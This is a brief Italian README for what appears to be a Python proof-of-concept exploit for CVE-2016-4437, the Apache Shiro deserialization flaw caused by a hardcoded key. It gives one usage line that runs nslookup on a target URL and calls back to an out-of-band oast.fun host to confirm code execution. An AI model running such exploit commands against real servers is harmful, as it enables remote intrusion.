
Python POC per sfruttare la vulnerabilità di deserializzazione CVE-2016-4437 di Apache Shiro a causa di una chiave di crittografia hardcoded
Python POC per sfruttare la vulnerabilità di deserializzazione di Apache Shiro CVE-2016-4437 dovuta a una chiave di crittografia hardcoded
Esempio di utilizzo:
./CVE-2016-4437.py -c nslookup -u https://example.com/ -i ecsepnkqtxlishpynfdge01543e4vmx7v.oast.fun
Vedi i commenti e il codice per maggiori informazioni.